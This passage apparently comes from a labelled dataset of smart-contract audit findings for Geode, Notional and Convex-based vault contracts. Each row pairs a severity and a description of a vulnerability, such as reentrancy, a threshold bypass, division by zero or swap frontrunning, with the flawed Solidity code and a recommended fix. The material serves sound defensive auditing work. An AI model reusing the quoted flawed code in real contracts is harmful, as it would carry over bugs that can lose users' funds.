switchMaintainerFee(\\n DataStoreUtils.DataStore storage DATASTORE,\\n uint256 id,\\n uint256 newFee\\n) external {\\n DATASTORE.writeUintForId(\\n id,\\n ""priorFee"",\\n DATASTORE.readUintForId(id, ""fee"")\\n );\\n DATASTORE.writeUintForId(\\n id,\\n ""feeSwitch"",\\n block.timestamp + FEE\\_SWITCH\\_LATENCY\\n );\\n DATASTORE.writeUintForId(id, ""fee"", newFee);\\n\\n emit MaintainerFeeSwitched(\\n id,\\n newFee,\\n block.timestamp + FEE\\_SWITCH\\_LATENCY\\n );\\n}\\n```\\n" +MiniGovernance's senate has almost unlimited validity,medium,"A new senate for the MiniGovernance contract is set in the following line:\\n```\\nGEM.\\_setSenate(newSenate, block.timestamp + SENATE\\_VALIDITY);\\n```\\n\\nThe validity period argument should not include `block.timestamp`, because it is going to be added a bit later in the code:\\n```\\nself.SENATE\\_EXPIRY = block.timestamp + 
\\_senatePeriod;\\n```\\n\\nSo currently, every senate of MiniGovernance will have much longer validity than it is supposed to.",Pass only SENATE_VALIDITY in the `_refreshSenate` function.,,"```\\nGEM.\\_setSenate(newSenate, block.timestamp + SENATE\\_VALIDITY);\\n```\\n" +Proposed validators not accounted for in the monopoly check.,medium,"The Geode team introduced a check that makes sure that node operators do not initiate more validators than a threshold called `MONOPOLY_THRESHOLD` allows. It is used on a call to `proposeStake(...)` which the operator would call in order to propose new validators. It is worth mentioning that onboarding new validator nodes requires 2 steps: a proposal from the node operator and approval from the planet maintainer. After the first step validators get a status of `proposed`. After the second step validators get the status of `active` and all ETH accounting is done. The issue we found is that the `proposed` validators step performs the monopoly check but does not account for previously `proposed` but not `active` validators.\\nAssume that `MONOPOLY_THRESHOLD` is set to 5. The node operator could propose 4 new validators and pass the monopoly check and label those validators as `proposed`. The node operator could then suggest 4 more validators in a separate transaction and since the monopoly check does not check for the `proposed` validators, that would pass as well. 
Then in `beaconStake` or the step of maintainer approval, there is no monopoly check at all, so 8 validators could be activated at once.\\n```\\nrequire(\\n (DATASTORE.readUintForId(operatorId, ""totalActiveValidators"") +\\n pubkeys.length) <= self.TELESCOPE.MONOPOLY\\_THRESHOLD,\\n ""StakeUtils: IceBear does NOT like monopolies""\\n);\\n```\\n","Include the `(DATASTORE.readUintForId(poolId,DataStoreUtils.getKey(operatorId, ""proposedValidators""))` into the require statement, just like in the check for the node operator allowance check.\\n```\\nrequire(\\n (DATASTORE.readUintForId(\\n poolId,\\n DataStoreUtils.getKey(operatorId, ""proposedValidators"")\\n ) +\\n DATASTORE.readUintForId(\\n poolId,\\n DataStoreUtils.getKey(operatorId, ""activeValidators"")\\n ) +\\n pubkeys.length) <=\\n operatorAllowance(DATASTORE, poolId, operatorId),\\n ""StakeUtils: NOT enough allowance""\\n);\\n```\\n",,"```\\nrequire(\\n (DATASTORE.readUintForId(operatorId, ""totalActiveValidators"") +\\n pubkeys.length) <= self.TELESCOPE.MONOPOLY\\_THRESHOLD,\\n ""StakeUtils: IceBear does NOT like monopolies""\\n);\\n```\\n" +Comparison operator used instead of assignment operator,medium,```\\nself.\\_validators[\\_pk].state == 2;\\n```\\n\\n```\\nself.\\_validators[\\_pk].state == 3;\\n```\\n,Replace `==` with `=`.,,```\\nself.\\_validators[\\_pk].state == 2;\\n```\\n +initiator modifier will not work in the context of one transaction,low,"Each planet, comet or operator must be initialized after the onboarding proposal is approved. 
In order to make sure that these entities are not initialized more than once `initiateOperator`, `initiateComet` and `initiatePlanet` have the `initiator` modifier.\\n```\\nfunction initiatePlanet(\\n DataStoreUtils.DataStore storage DATASTORE,\\n uint256[3] memory uintSpecs,\\n address[5] memory addressSpecs,\\n string[2] calldata interfaceSpecs\\n)\\n external\\n initiator(DATASTORE, 5, uintSpecs[0], addressSpecs[1])\\n returns (\\n address miniGovernance,\\n address gInterface,\\n address withdrawalPool\\n )\\n```\\n\\n```\\nfunction initiateComet(\\n DataStoreUtils.DataStore storage DATASTORE,\\n uint256 id,\\n uint256 fee,\\n address maintainer\\n) external initiator(DATASTORE, 6, id, maintainer) {\\n```\\n\\n```\\nfunction initiateOperator(\\n DataStoreUtils.DataStore storage DATASTORE,\\n uint256 id,\\n uint256 fee,\\n address maintainer\\n) external initiator(DATASTORE, 4, id, maintainer) {\\n```\\n\\nInside that modifier, we check that the `initiated` flag is 0 and if so we proceed to initialization. We later update it to the current timestamp.\\n```\\nmodifier initiator(\\n DataStoreUtils.DataStore storage DATASTORE,\\n uint256 \\_TYPE,\\n uint256 \\_id,\\n address \\_maintainer\\n) {\\n require(\\n msg.sender == DATASTORE.readAddressForId(\\_id, ""CONTROLLER""),\\n ""MaintainerUtils: sender NOT CONTROLLER""\\n );\\n require(\\n DATASTORE.readUintForId(\\_id, ""TYPE"") == \\_TYPE,\\n ""MaintainerUtils: id NOT correct TYPE""\\n );\\n require(\\n DATASTORE.readUintForId(\\_id, ""initiated"") == 0,\\n ""MaintainerUtils: already initiated""\\n );\\n\\n DATASTORE.writeAddressForId(\\_id, ""maintainer"", \\_maintainer);\\n\\n \\_;\\n\\n DATASTORE.writeUintForId(\\_id, ""initiated"", block.timestamp);\\n\\n emit IdInitiated(\\_id, \\_TYPE);\\n}\\n```\\n\\nUnfortunately, this does not follow the checks-effects-interractions pattern. 
If one for example would call `initiatePlanet` again from the body of the modifier, this check will still pass making it susceptible to a reentrancy attack. While we could not find a way to exploit this in the current engagement, given that system is designed to be upgradable this could become a risk in the future. For example, if during the initialization of the planet the maintainer will be allowed to pass a custom interface that could potentially allow reentering.","Bring the line that updated the `initiated` flag to the current timestamp before the `_;`.\\n```\\nDATASTORE.writeUintForId(\\_id, ""initiated"", block.timestamp);\\n```\\n",,"```\\nfunction initiatePlanet(\\n DataStoreUtils.DataStore storage DATASTORE,\\n uint256[3] memory uintSpecs,\\n address[5] memory addressSpecs,\\n string[2] calldata interfaceSpecs\\n)\\n external\\n initiator(DATASTORE, 5, uintSpecs[0], addressSpecs[1])\\n returns (\\n address miniGovernance,\\n address gInterface,\\n address withdrawalPool\\n )\\n```\\n" +Incorrect accounting for the burned gEth,low,"Geode Portal records the amount of minted and burned gETH on any given day during the active period of the oracle. One case where some gETH is burned is when the users redeem gETH for ETH. 
In the burn function we burn the spentGeth - `gEthDonation` but in the accounting code we do not account for `gEthDonation` so the code records more assets burned than was really burned.\\n```\\nDATASTORE.subUintForId(poolId, ""surplus"", spentSurplus);\\nself.gETH.burn(address(this), poolId, spentGeth - gEthDonation);\\n\\nif (self.TELESCOPE.\\_isOracleActive()) {\\n bytes32 dailyBufferKey = DataStoreUtils.getKey(\\n block.timestamp - (block.timestamp % OracleUtils.ORACLE\\_PERIOD),\\n ""burnBuffer""\\n );\\n DATASTORE.addUintForId(poolId, dailyBufferKey, spentGeth);\\n}\\n```\\n","Record the `spentGeth` - gEthDonation instead of just `spentGeth` in the burn buffer.\\n```\\nDATASTORE.addUintForId(poolId, dailyBufferKey, spentGeth);\\n```\\n",,"```\\nDATASTORE.subUintForId(poolId, ""surplus"", spentSurplus);\\nself.gETH.burn(address(this), poolId, spentGeth - gEthDonation);\\n\\nif (self.TELESCOPE.\\_isOracleActive()) {\\n bytes32 dailyBufferKey = DataStoreUtils.getKey(\\n block.timestamp - (block.timestamp % OracleUtils.ORACLE\\_PERIOD),\\n ""burnBuffer""\\n );\\n DATASTORE.addUintForId(poolId, dailyBufferKey, spentGeth);\\n}\\n```\\n" +Boost calculation on fetchUnstake should not be using the cumBalance when it is larger than debt.,low,"The Geode team implemented the 2-step withdrawal mechanism for the staked ETH. First, node operators signal their intent to withdraw the stake, and then the oracle will trigger all of the accounting of rewards, balances, and buybacks if necessary. Buybacks are what we are interested in at this time. Buybacks are performed by checking if the derivative asset is off peg in the Dynamic Withdrawal Pool contract. Once the debt is larger than some ignorable threshold an arbitrage buyback will be executed. A portion of the arbitrage profit will go to the node operator. The issue here is that when simulating the arbitrage swap in the `calculateSwap` call we use the cumulative un-stake balance rather than ETH debt preset in the DWP. 
In the case where the withdrawal cumulative balance is higher than the debt, the node operator will receive a higher reward than intended.\\n```\\nuint256 arb = withdrawalPoolById(DATASTORE, poolId)\\n .calculateSwap(0, 1, cumBal);\\n```\\n",Use the `debt` amount of ETH in the boost reward calculation when the cumulative balance is larger than the `debt`.,,"```\\nuint256 arb = withdrawalPoolById(DATASTORE, poolId)\\n .calculateSwap(0, 1, cumBal);\\n```\\n" +DataStore struct not having the _gap for upgrades.,low,"```\\nDataStoreUtils.DataStore private DATASTORE;\\nGeodeUtils.Universe private GEODE;\\nStakeUtils.StakePool private STAKEPOOL;\\n```\\n\\nIt is worth mentioning that Geode contracts are meant to support the upgradability pattern. Given that information, one should be careful not to overwrite the storage variables by reordering the old ones or adding the new ones not at the end of the list of variables when upgrading. The issue comes with the fact that structs seem to give a false sense of security making it feel like they are an isolated set of storage variables that will not override anything else. In reality, structs are just tuples that are expanded in storage sequentially just like all the other storage variables. For that reason, if you have two struct storage variables listed back to back like in the code above, you either need to make sure not to change the order or the number of variables in the structs other than the last one between upgrades or you need to add a `uint256[N] _gap` array of fixed size to reserve some storage slots for the future at the end of each struct. The Geode Finance team is missing the gap in the `DataStore` struct making it non-upgradable.\\n```\\nstruct DataStore {\\n mapping(uint256 => uint256[]) allIdsByType;\\n mapping(bytes32 => uint256) uintData;\\n mapping(bytes32 => bytes) bytesData;\\n mapping(bytes32 => address) addressData;\\n}\\n```\\n",We suggest that a gap is used in DataStore as well. 
Since it was used for all the other structs we consider it just a typo.,,```\\nDataStoreUtils.DataStore private DATASTORE;\\nGeodeUtils.Universe private GEODE;\\nStakeUtils.StakePool private STAKEPOOL;\\n```\\n +Handle division by 0,medium,"There are a few places in the code where division by zero may occur but isn't handled.\\nIf the vault settles at exactly 0 value with 0 remaining strategy token value, there may be an unhandled division by zero trying to divide claims on the settled assets:\\n```\\nint256 settledVaultValue = settlementRate.convertToUnderlying(residualAssetCashBalance)\\n .add(totalStrategyTokenValueAtSettlement);\\n\\n// If the vault is insolvent (meaning residualAssetCashBalance < 0), it is necessarily\\n// true that totalStrategyTokens == 0 (meaning all tokens were sold in an attempt to\\n// repay the debt). That means settledVaultValue == residualAssetCashBalance, strategyTokenClaim == 0\\n// and assetCashClaim == totalAccountValue. Accounts that are still solvent will be paid from the\\n// reserve, accounts that are insolvent will have a totalAccountValue == 0.\\nstrategyTokenClaim = totalAccountValue.mul(vaultState.totalStrategyTokens.toInt())\\n .div(settledVaultValue).toUint();\\n\\nassetCashClaim = totalAccountValue.mul(residualAssetCashBalance)\\n .div(settledVaultValue);\\n```\\n\\nIf a vault account is entirely insolvent and its `vaultShareValue` is zero, there will be an unhandled division by zero during liquidation:\\n```\\nuint256 vaultSharesToLiquidator;\\n{\\n vaultSharesToLiquidator = vaultAccount.tempCashBalance.toUint()\\n .mul(vaultConfig.liquidationRate.toUint())\\n .mul(vaultAccount.vaultShares)\\n .div(vaultShareValue.toUint())\\n .div(uint256(Constants.RATE\\_PRECISION));\\n}\\n```\\n\\nIf a vault account's secondary debt is being repaid when there is none, there will be an unhandled division by zero:\\n```\\nVaultSecondaryBorrowStorage storage balance =\\n 
LibStorage.getVaultSecondaryBorrow()[vaultConfig.vault][maturity][currencyId];\\nuint256 totalfCashBorrowed = balance.totalfCashBorrowed;\\nuint256 totalAccountDebtShares = balance.totalAccountDebtShares;\\n\\nfCashToLend = debtSharesToRepay.mul(totalfCashBorrowed).div(totalAccountDebtShares).toInt();\\n```\\n\\nWhile these cases may be unlikely today, this code could be reutilized in other circumstances later that could cause reverts and even disrupt operations more frequently.",Handle the cases where the denominator could be zero appropriately.,,"```\\nint256 settledVaultValue = settlementRate.convertToUnderlying(residualAssetCashBalance)\\n .add(totalStrategyTokenValueAtSettlement);\\n\\n// If the vault is insolvent (meaning residualAssetCashBalance < 0), it is necessarily\\n// true that totalStrategyTokens == 0 (meaning all tokens were sold in an attempt to\\n// repay the debt). That means settledVaultValue == residualAssetCashBalance, strategyTokenClaim == 0\\n// and assetCashClaim == totalAccountValue. Accounts that are still solvent will be paid from the\\n// reserve, accounts that are insolvent will have a totalAccountValue == 0.\\nstrategyTokenClaim = totalAccountValue.mul(vaultState.totalStrategyTokens.toInt())\\n .div(settledVaultValue).toUint();\\n\\nassetCashClaim = totalAccountValue.mul(residualAssetCashBalance)\\n .div(settledVaultValue);\\n```\\n" +Increasing a leveraged position in a vault with secondary borrow currency will revert,low,"From the client's specifications for the strategy vaults, we know that accounts should be able to increase their leveraged positions before maturity. This property will not hold for the vaults that require borrowing a secondary currency to enter a position. When an account opens its position in such vault for the first time, the `VaultAccountSecondaryDebtShareStorage.maturity` is set to the maturity an account has entered. 
When the account is trying to increase the debt position, an account's current maturity will be checked, and since it is not set to 0, as in the case where an account enters the vault for the first time, nor is it smaller than the new maturity passed by an account as in the case of a rollover, the code will revert.\\n```\\nif (accountMaturity != 0) {\\n // Cannot roll to a shorter term maturity\\n require(accountMaturity < maturity);\\n```\\n","In order to fix this issue, we recommend that `<` is replaced with `<=` so that an account can enter the vault maturity the account is already in as well as the future ones.",,```\\nif (accountMaturity != 0) {\\n // Cannot roll to a shorter term maturity\\n require(accountMaturity < maturity);\\n```\\n +Secondary Currency debt is not managed by the Notional Controller,low,"Some of the Notional Strategy Vaults may allow for secondary currencies to be borrowed as part of the same strategy. For example, a strategy may allow for USDC to be its primary borrow currency as well as have ETH as its secondary borrow currency.\\nIn order to enter the vault, a user would have to deposit `depositAmountExternal` of the primary borrow currency when calling `VaultAccountAction.enterVault()`. This would allow the user to borrow with leverage, as long as the `vaultConfig.checkCollateralRatio()` check on that account succeeds, which is based on the initial deposit and borrow currency amounts. This collateral ratio check is then performed throughout that user account's lifecycle in that vault, such as when they try to roll their maturity, or when liquidators try to perform collateral checks to ensure there is no bad debt.\\nHowever, in the event that the vault has a secondary borrow currency as well, that additional secondary debt is not calculated as part of the `checkCollateralRatio()` check. 
The only debt that is being considered is the `vaultAccount.fCash` that corresponds to the primary borrow currency debt:\\n```\\nfunction checkCollateralRatio(\\n VaultConfig memory vaultConfig,\\n VaultState memory vaultState,\\n VaultAccount memory vaultAccount\\n) internal view {\\n (int256 collateralRatio, /\\* \\*/) = calculateCollateralRatio(\\n vaultConfig, vaultState, vaultAccount.account, vaultAccount.vaultShares, vaultAccount.fCash\\n```\\n\\n```\\nfunction calculateCollateralRatio(\\n VaultConfig memory vaultConfig,\\n VaultState memory vaultState,\\n address account,\\n uint256 vaultShares,\\n int256 fCash\\n) internal view returns (int256 collateralRatio, int256 vaultShareValue) {\\n vaultShareValue = vaultState.getCashValueOfShare(vaultConfig, account, vaultShares);\\n\\n // We do not discount fCash to present value so that we do not introduce interest\\n // rate risk in this calculation. The economic benefit of discounting will be very\\n // minor relative to the added complexity of accounting for interest rate risk.\\n\\n // Convert fCash to a positive amount of asset cash\\n int256 debtOutstanding = vaultConfig.assetRate.convertFromUnderlying(fCash.neg());\\n```\\n\\nWhereas the value of strategy tokens that belong to that user account are being calculated by calling `IStrategyVault(vault).convertStrategyToUnderlying()` on the associated strategy vault:\\n```\\nfunction getCashValueOfShare(\\n VaultState memory vaultState,\\n VaultConfig memory vaultConfig,\\n address account,\\n uint256 vaultShares\\n) internal view returns (int256 assetCashValue) {\\n if (vaultShares == 0) return 0;\\n (uint256 assetCash, uint256 strategyTokens) = getPoolShare(vaultState, vaultShares);\\n int256 underlyingInternalStrategyTokenValue = \\_getStrategyTokenValueUnderlyingInternal(\\n vaultConfig.borrowCurrencyId, vaultConfig.vault, account, strategyTokens, vaultState.maturity\\n );\\n```\\n\\n```\\nfunction \\_getStrategyTokenValueUnderlyingInternal(\\n uint16 
currencyId,\\n address vault,\\n address account,\\n uint256 strategyTokens,\\n uint256 maturity\\n) private view returns (int256) {\\n Token memory token = TokenHandler.getUnderlyingToken(currencyId);\\n // This will be true if the the token is ""NonMintable"" meaning that it does not have\\n // an underlying token, only an asset token\\n if (token.decimals == 0) token = TokenHandler.getAssetToken(currencyId);\\n\\n return token.convertToInternal(\\n IStrategyVault(vault).convertStrategyToUnderlying(account, strategyTokens, maturity)\\n );\\n}\\n```\\n\\nFrom conversations with the Notional team, it is assumed that this call returns the strategy token value subtracted against the secondary currencies debt, as is the case in the `Balancer2TokenVault` for example. In other words, when collateral ratio checks are performed, those strategy vaults that utilize secondary currency borrows would need to calculate the value of strategy tokens already accounting for any secondary debt. However, this is a dependency for a critical piece of the Notional controller's strategy vaults collateral checks.\\nTherefore, even though the strategy vaults' code and logic would be vetted before their whitelisting into the Notional system, they would still remain an external dependency with relatively arbitrary code responsible for the liquidation infrastructure that could lead to bad debt or incorrect liquidations if the vaults give inaccurate information, and thus potential loss of funds.","Specific strategy vault implementations using secondary borrows were not in scope of this audit. 
However, since the core Notional Vault system was, and it includes secondary borrow currency functionality, from the point of view of the larger Notional system it is recommended to include secondary debt checks within the Notional controller contract to reduce external dependency on the strategy vaults' logic.",,"```\\nfunction checkCollateralRatio(\\n VaultConfig memory vaultConfig,\\n VaultState memory vaultState,\\n VaultAccount memory vaultAccount\\n) internal view {\\n (int256 collateralRatio, /\\* \\*/) = calculateCollateralRatio(\\n vaultConfig, vaultState, vaultAccount.account, vaultAccount.vaultShares, vaultAccount.fCash\\n```\\n" +Vaults are unable to borrow single secondary currency,low,"As was previously mentioned some strategies `require` borrowing one or two secondary currencies. All secondary currencies have to be whitelisted in the `VaultConfig.secondaryBorrowCurrencies`. Borrow operation on secondary currencies is performed in the `borrowSecondaryCurrencyToVault(...)` function. Due to a `require` statement in that function, vaults will only be able to borrow secondary currencies if both of the currencies are whitelisted in `VaultConfig.secondaryBorrowCurrencies`. Considering that many strategies will have just one secondary currency, this will prevent those strategies from borrowing any secondary assets.\\n```\\nrequire(currencies[0] != 0 && currencies[1] != 0);\\n```\\n","We suggest that the `&&` operator is replaced by the `||` operator. 
Ideally, an additional check will be performed that will ensure that values in argument arrays `fCashToBorrow`, `maxBorrowRate`, and `minRollLendRate` are passed under the same index as the whitelisted currencies in `VaultConfig.secondaryBorrowCurrencies`.\\n```\\nfunction borrowSecondaryCurrencyToVault(\\n address account,\\n uint256 maturity,\\n uint256[2] calldata fCashToBorrow,\\n uint32[2] calldata maxBorrowRate,\\n uint32[2] calldata minRollLendRate\\n) external override returns (uint256[2] memory underlyingTokensTransferred) {\\n```\\n",,```\\nrequire(currencies[0] != 0 && currencies[1] != 0);\\n```\\n +An account roll may be impossible if the vault is already at the maximum borrow capacity.,low,"One of the actions allowed in Notional Strategy Vaults is to roll an account's maturity to a later one by borrowing from a later maturity and repaying that into the debt of the earlier maturity.\\nHowever, this could cause an issue if the vault is at maximum capacity at the time of the roll. When an account performs this type of roll, the new borrow would have to be more than the existing debt simply because it has to at least cover the existing debt and pay for the borrow fees that get added on every new borrow. 
Since the whole vault was already at max borrow capacity before with the old, smaller borrow, this process would revert at the end after the new borrow as well once the process gets to `VaultAccount.updateAccountfCash` and VaultConfiguration.updateUsedBorrowCapacity:\\n```\\nfunction updateUsedBorrowCapacity(\\n address vault,\\n uint16 currencyId,\\n int256 netfCash\\n) internal returns (int256 totalUsedBorrowCapacity) {\\n VaultBorrowCapacityStorage storage cap = LibStorage.getVaultBorrowCapacity()[vault][currencyId];\\n\\n // Update the total used borrow capacity, when borrowing this number will increase (netfCash < 0),\\n // when lending this number will decrease (netfCash > 0).\\n totalUsedBorrowCapacity = int256(uint256(cap.totalUsedBorrowCapacity)).sub(netfCash);\\n if (netfCash < 0) {\\n // Always allow lending to reduce the total used borrow capacity to satisfy the case when the max borrow\\n // capacity has been reduced by governance below the totalUsedBorrowCapacity. When borrowing, it cannot\\n // go past the limit.\\n require(totalUsedBorrowCapacity <= int256(uint256(cap.maxBorrowCapacity)), ""Max Capacity"");\\n```\\n\\nThe result is that users won't be able to roll while the vault is at max capacity. However, users may exit some part of their position to reduce their borrow, thereby reducing the overall vault borrow capacity, and then could execute the roll. A bigger problem would occur if the vault configuration got updated to massively reduce the borrow capacity, which would force users to exit their position more significantly with likely a much smaller chance at being able to roll.",Document this case so that users can realise that rolling may not always be an option. 
Perhaps consider adding ways where users can pay a small deposit, like on `enterVault`, to offset the additional difference in borrows and pay for fees so they can remain with essentially the same size position within Notional.",,"```\\nfunction updateUsedBorrowCapacity(\\n address vault,\\n uint16 currencyId,\\n int256 netfCash\\n) internal returns (int256 totalUsedBorrowCapacity) {\\n VaultBorrowCapacityStorage storage cap = LibStorage.getVaultBorrowCapacity()[vault][currencyId];\\n\\n // Update the total used borrow capacity, when borrowing this number will increase (netfCash < 0),\\n // when lending this number will decrease (netfCash > 0).\\n totalUsedBorrowCapacity = int256(uint256(cap.totalUsedBorrowCapacity)).sub(netfCash);\\n if (netfCash < 0) {\\n // Always allow lending to reduce the total used borrow capacity to satisfy the case when the max borrow\\n // capacity has been reduced by governance below the totalUsedBorrowCapacity. When borrowing, it cannot\\n // go past the limit.\\n require(totalUsedBorrowCapacity <= int256(uint256(cap.maxBorrowCapacity)), ""Max Capacity"");\\n```\\n" +Rollover might introduce economically impractical deposits of dust into a strategy,low,"During the rollover of the strategy position into a longer maturity, several things happen:\\nFunds are borrowed from the longer maturity to pay off the debt and fees of the current maturity.\\nStrategy tokens that are associated with the current maturity are moved to the new maturity.\\nAny additional funds provided by the account are deposited into the strategy into a new longer maturity.\\nIn reality, due to the AMM nature of the protocol, the funds borrowed from the new maturity could exceed the debt the account has in the current maturity, resulting in a non-zero `vaultAccount.tempCashBalance`. In that case, those funds will be deposited into the strategy. 
That would happen even if there are no external funds supplied by the account for the deposit.\\nIt is possible that the dust in the temporary account balance will not cover the gas cost of triggering a full deposit call of the strategy.\\n```\\nuint256 strategyTokensMinted = vaultConfig.deposit(\\n vaultAccount.account, vaultAccount.tempCashBalance, vaultState.maturity, additionalUnderlyingExternal, vaultData\\n);\\n```\\n",We suggest that additional checks are introduced that would check that on rollover `vaultAccount.tempCashBalance + additionalUnderlyingExternal > 0` or larger than a certain threshold like `minAccountBorrowSize` for example.,,"```\\nuint256 strategyTokensMinted = vaultConfig.deposit(\\n vaultAccount.account, vaultAccount.tempCashBalance, vaultState.maturity, additionalUnderlyingExternal, vaultData\\n);\\n```\\n" +Strategy vault swaps can be frontrun,low,"Some strategy vaults utilize borrowing one currency, swapping it for another, and then using the new currency somewhere to generate yield. For example, the CrossCurrencyfCash strategy vault could borrow USDC, swap it for DAI, and then deposit that DAI back into Notional if the DAI lending interest rates are greater than USDC borrowing interest rates. However, during vault settlement the assets would need to be swapped back into the original borrow currency.\\nSince these vaults control the borrowed assets that go only into white-listed strategies, the Notional system allows users to borrow multiples of their posted collateral and claim the yield from a much larger position. As a result, these strategy vaults would likely have significant funds being borrowed and managed into these strategies.\\nHowever, as mentioned above, these strategies usually utilize a trading mechanism to swap borrowed currencies into whatever is required by the strategy, and these trades may be quite large. 
In fact, the `BaseStrategyVault` implementation contains functions that interact with Notional's trading module to assist with those swaps:\\n```\\n/// @notice Can be used to delegate call to the TradingModule's implementation in order to execute\\n/// a trade.\\nfunction \\_executeTrade(\\n uint16 dexId,\\n Trade memory trade\\n) internal returns (uint256 amountSold, uint256 amountBought) {\\n (bool success, bytes memory result) = nProxy(payable(address(TRADING\\_MODULE))).getImplementation()\\n .delegatecall(abi.encodeWithSelector(ITradingModule.executeTrade.selector, dexId, trade));\\n require(success);\\n (amountSold, amountBought) = abi.decode(result, (uint256, uint256));\\n}\\n\\n/// @notice Can be used to delegate call to the TradingModule's implementation in order to execute\\n/// a trade.\\nfunction \\_executeTradeWithDynamicSlippage(\\n uint16 dexId,\\n Trade memory trade,\\n uint32 dynamicSlippageLimit\\n) internal returns (uint256 amountSold, uint256 amountBought) {\\n (bool success, bytes memory result) = nProxy(payable(address(TRADING\\_MODULE))).getImplementation()\\n .delegatecall(abi.encodeWithSelector(\\n ITradingModule.executeTradeWithDynamicSlippage.selector,\\n dexId, trade, dynamicSlippageLimit\\n )\\n );\\n require(success);\\n (amountSold, amountBought) = abi.decode(result, (uint256, uint256));\\n}\\n```\\n\\nAlthough some strategies may manage stablecoin <-> stablecoin swaps that typically would incur low slippage, large size trades could still suffer from low on-chain liquidity and end up getting frontrun and “sandwiched” by MEV bots or other actors, thereby extracting maximum amount from the strategy vault swaps as slippage permits. This could be especially significant during vaults' settlements, that can be initiated by anyone, as lending currencies may be swapped in large batches and not do it on a per-account basis. 
For example with the CrossCurrencyfCash vault, it can only enter settlement if all strategy tokens (lending currency in this case) are gone and swapped back into the borrow currency:\\n```\\nif (vaultState.totalStrategyTokens == 0) {\\n NOTIONAL.settleVault(address(this), maturity);\\n}\\n```\\n\\nAs a result, in addition to the risk of stablecoins' getting off-peg, unfavorable market liquidity conditions and arbitrage-seeking actors could eat into the profits generated by this strategy as per the maximum allowed slippage. However, during settlement the strategy vaults don't have the luxury of waiting for the right conditions to perform the trade as the borrows need to repaid at their maturities.\\nSo, the profitability of the vaults, and therefore users, could suffer due to potential low market liquidity allowing high slippage and risks of being frontrun with the chosen strategy vaults' currencies.",Ensure that the currencies chosen to generate yield in the strategy vaults have sufficient market liquidity on exchanges allowing for low slippage swaps.,,"```\\n/// @notice Can be used to delegate call to the TradingModule's implementation in order to execute\\n/// a trade.\\nfunction \\_executeTrade(\\n uint16 dexId,\\n Trade memory trade\\n) internal returns (uint256 amountSold, uint256 amountBought) {\\n (bool success, bytes memory result) = nProxy(payable(address(TRADING\\_MODULE))).getImplementation()\\n .delegatecall(abi.encodeWithSelector(ITradingModule.executeTrade.selector, dexId, trade));\\n require(success);\\n (amountSold, amountBought) = abi.decode(result, (uint256, uint256));\\n}\\n\\n/// @notice Can be used to delegate call to the TradingModule's implementation in order to execute\\n/// a trade.\\nfunction \\_executeTradeWithDynamicSlippage(\\n uint16 dexId,\\n Trade memory trade,\\n uint32 dynamicSlippageLimit\\n) internal returns (uint256 amountSold, uint256 amountBought) {\\n (bool success, bytes memory result) = 
nProxy(payable(address(TRADING\\_MODULE))).getImplementation()\\n .delegatecall(abi.encodeWithSelector(\\n ITradingModule.executeTradeWithDynamicSlippage.selector,\\n dexId, trade, dynamicSlippageLimit\\n )\\n );\\n require(success);\\n (amountSold, amountBought) = abi.decode(result, (uint256, uint256));\\n}\\n```\\n" +ConvexPositionHandler._claimRewards incorrectly calculates amount of LP tokens to unstake,high,"`ConvexPositionHandler._claimRewards` is an internal function that harvests Convex reward tokens and takes the generated yield in ETH out of the Curve pool by calculating the difference in LP token price. To do so, it receives the current share price of the curve LP tokens and compares it to the last one stored in the contract during the last rewards claim. The difference in share price is then multiplied by the LP token balance to get the ETH yield via the `yieldEarned` variable:\\n```\\nuint256 currentSharePrice = ethStEthPool.get\\_virtual\\_price();\\nif (currentSharePrice > prevSharePrice) {\\n // claim any gain on lp token yields\\n uint256 contractLpTokenBalance = lpToken.balanceOf(address(this));\\n uint256 totalLpBalance = contractLpTokenBalance +\\n baseRewardPool.balanceOf(address(this));\\n uint256 yieldEarned = (currentSharePrice - prevSharePrice) \\*\\n totalLpBalance;\\n```\\n\\nHowever, to receive this ETH yield, LP tokens need to be unstaked from the Convex pool and then converted via the Curve pool. To do this, the contract introduces lpTokenEarned:\\n```\\nuint256 lpTokenEarned = yieldEarned / NORMALIZATION\\_FACTOR; // 18 decimal from virtual price\\n```\\n\\nThis calculation is incorrect. 
It uses yieldEarned which is denominated in ETH and simply divides it by the normalization factor to get the correct number of decimals, which still returns back an amount denominated in ETH, whereas an amount denominated in LP tokens should be returned instead.\\nThis could lead to significant accounting issues including losses in the “no-loss” parts of the vault's strategy as 1 LP token is almost always guaranteed to be worth more than 1 ETH. So, when the intention is to withdraw `X` ETH worth of an LP token, withdrawing `X` LP tokens will actually withdraw `Y` ETH worth of an LP token, where `Y>X`. As a result, less than expected ETH will remain in the Convex handler part of the vault, and the ETH yield will go to the Lyra options, which are much riskier. In the event Lyra options don't work out and there is more ETH withdrawn than expected, there is a possibility that this would result in a loss for the vault.","The fix is straightforward and that is to calculate `lpTokenEarned` using the `currentSharePrice` already received from the Curve pool. That way, it is the amount of LP tokens that will be sent to be unwrapped and unstaked from the Convex and Curve pools. This will also take care of the normalization factor. 
`uint256 `lpTokenEarned` = yieldEarned / currentSharePrice;`",,```\\nuint256 currentSharePrice = ethStEthPool.get\\_virtual\\_price();\\nif (currentSharePrice > prevSharePrice) {\\n // claim any gain on lp token yields\\n uint256 contractLpTokenBalance = lpToken.balanceOf(address(this));\\n uint256 totalLpBalance = contractLpTokenBalance +\\n baseRewardPool.balanceOf(address(this));\\n uint256 yieldEarned = (currentSharePrice - prevSharePrice) \\*\\n totalLpBalance;\\n```\\n +The WETH tokens are not taken into account in the ConvexTradeExecutor.totalFunds function,high,"The `totalFunds` function of every executor should include all the funds that belong to the contract:\\n```\\nfunction totalFunds() public view override returns (uint256, uint256) {\\n return ConvexPositionHandler.positionInWantToken();\\n}\\n```\\n\\nThe `ConvexTradeExecutor` uses this function for calculations:\\n```\\nfunction positionInWantToken()\\n public\\n view\\n override\\n returns (uint256, uint256)\\n{\\n (\\n uint256 stakedLpBalanceInETH,\\n uint256 lpBalanceInETH,\\n uint256 ethBalance\\n ) = \\_getTotalBalancesInETH(true);\\n\\n return (\\n stakedLpBalanceInETH + lpBalanceInETH + ethBalance,\\n block.number\\n );\\n}\\n```\\n\\n```\\nfunction \\_getTotalBalancesInETH(bool useVirtualPrice)\\n internal\\n view\\n returns (\\n uint256 stakedLpBalance,\\n uint256 lpTokenBalance,\\n uint256 ethBalance\\n )\\n{\\n uint256 stakedLpBalanceRaw = baseRewardPool.balanceOf(address(this));\\n uint256 lpTokenBalanceRaw = lpToken.balanceOf(address(this));\\n\\n uint256 totalLpBalance = stakedLpBalanceRaw + lpTokenBalanceRaw;\\n\\n // Here, in order to prevent price manipulation attacks via 